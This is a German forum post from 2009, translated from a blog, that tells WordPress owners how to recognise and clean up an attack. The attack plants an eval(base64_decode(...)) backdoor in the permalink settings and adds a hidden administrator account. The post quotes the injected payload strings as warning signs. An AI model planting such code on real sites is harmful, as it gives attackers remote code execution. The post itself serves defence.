OK, hier ist der Tipp, der den Schaden erst einmal eingrenzt. Der Autor des Beitrages weist ausdrücklich darauf hin, dass er zunächst einmal möglichst schnell eine Hilfe anbieten wollte, und seine Methode nicht fehlerfrei sein könnte. Der Stand ist 5.09.2009.
Wer sich nicht sicher genug fühlt, derartige Eingriffe in sein System vorzunehmen, sollte dies einemn Profi überlassen!
Gelesen bei Journey.etc : (Übersetzung von mir)
[FONT="]Wenn Sie Wordpress nicht in der aktuellsten Version (2.8.4) verwenden, sollten Sie umgehend die Permalinks / RSS Feed-Einstellungen Ihres Blogs überprüfen. Fals diese in etwa so aussehen:[/FONT]
[FONT="] “%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/”[/FONT]
[FONT="]oder[/FONT]
[FONT="]“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%[/FONT]
[FONT="]oder[/FONT]
[FONT="]‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’ für Ihren Feed[/FONT]
[FONT="]Sind Sie Opfer einer neuen Welle von Angriffen auf Blogs geworden.[/FONT]
[FONT="]Was ist zu tun:[/FONT]
[FONT="]-[/FONT][FONT="]Unter Einstellungen -> Permalinks den schadhaften Code entfernen[/FONT]
[FONT="]-[/FONT][FONT="]Unter Benutzern, werden Sie feststellen, dass mehr Administratoren aufgelistet werden, als Sie erwarten[/FONT]
[FONT="]Bewegen Sie den Mauszeiger über den Benutzer, der als neuester Administrator eingetragen ist, klicken Sie den Link zum Bearbeiten der URL und kopieren Sie die Link Adresse, und fügen anschliessend diese in die Adresszeile Ihres Browsers ein, wobei Sie die laufende Ziffer hinter „user_id=“ um 1 erhöhen.[/FONT]
Bild
[FONT="]Sie werden auf diese Weise den versteckten Administrator finden, dessen Vornamen-Feld einen eigenartigen Code enthält. Löschen Sie diesen Code, und setzen Sie die Rolle dieses Benutzers auf Abonnent. Kehren Sie zur Liste der Benutzer zurück, und löschen Sie den nun sichtbaren zusätzlichen Benutzer.[/FONT]
[FONT="]Dies sollte den Angriff stoppen. Vergessen Sie nicht, auf die neueste Wordpress-Version zu aktualisieren. [/FONT]